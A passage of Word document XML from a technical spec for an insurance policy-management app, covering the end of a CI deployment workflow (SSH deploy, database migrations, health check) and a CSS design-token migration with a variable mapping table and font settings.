          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - name: Deploy via SSH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        run: |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">          ssh ${{ secrets.DEPLOY_HOST }}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            "cd /opt/policymanager &amp;&amp; docker compose pull &amp;&amp; docker compose up -d"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - name: Run DB migrations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        run: |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">          docker exec policymanager-api</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            dotnet ef database update</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - name: Health check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        run: |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">          sleep 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">          curl -f https://api.policymanager.in/health</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            || (echo "Health check failed" &amp;&amp; exit 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec6" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E1B4B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 6 — Design System Implementation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All design changes are applied to a single file: src/styles.css. No component-level CSS changes are required for the token migration — CSS variables propagate automatically. Component-specific changes are noted where required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec6-1" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1  CSS Token Migration — styles.css</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Add Font Import (top of styles.css)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">@import url("https://fonts.googleapis.com/css2?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  family=DM+Sans:ital,opsz,wght@0,9..40,300..800;1,9..40,300..700</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  &amp;family=DM+Mono:wght@400;500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  &amp;display=swap");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Replace :root Variables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace the existing :root block entirely with the new 3-tier token system. The mapping table below shows old variable names mapped to new equivalents to ensure smooth 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3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Old Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">New Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Notes</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--color-primary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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--brand-primary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Now maps to #6366F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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--color-primary-light</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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--text-brand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="376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For text use only</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--color-primary-dark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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--brand-primary-hover</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Hover state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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--bg-card</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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--bg-surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="376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Default card background</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--bg-secondary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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--bg-elevated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Elevated surfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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--glass-bg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Deprecated — use card variants</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="376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See Section 4.4</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--glass-border</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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--border-default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Unified border token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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--color-success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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--status-success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="376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Green</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--color-danger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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--status-danger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Rose (not same red as data-outflow)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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--color-warning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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--status-warning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="376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Amber</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--text-primary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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--text-primary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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No change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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--text-muted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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--text-muted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="376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Value updated: #71717A</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--radius-sm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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--radius-sm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Value updated: 6px</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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--radius-md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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--radius-md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="376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Value updated: 10px</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--radius-lg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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--radius-lg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Value updated: 16px</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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--transition-base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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--duration-base + --ease-in-out</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="376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Split for precision</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 — Update Font Stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">body {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    font-family: "DM Sans", -apple-system, system-ui, sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    font-optical-sizing: auto;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    font-feature-settings: "kern" 1, "liga" 1, "calt" 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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Policy numbers, amounts — always monospaced */  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">.policy-number, .amount-value, .premium-value,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">td.td-mono, code, .metric-value {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    font-family: "DM Mono", "Cascadia Code", monospace;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    font-variant-numeric: tabular-nums;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec6-2" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2  Card Variants — Replace Glass Everywhere</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
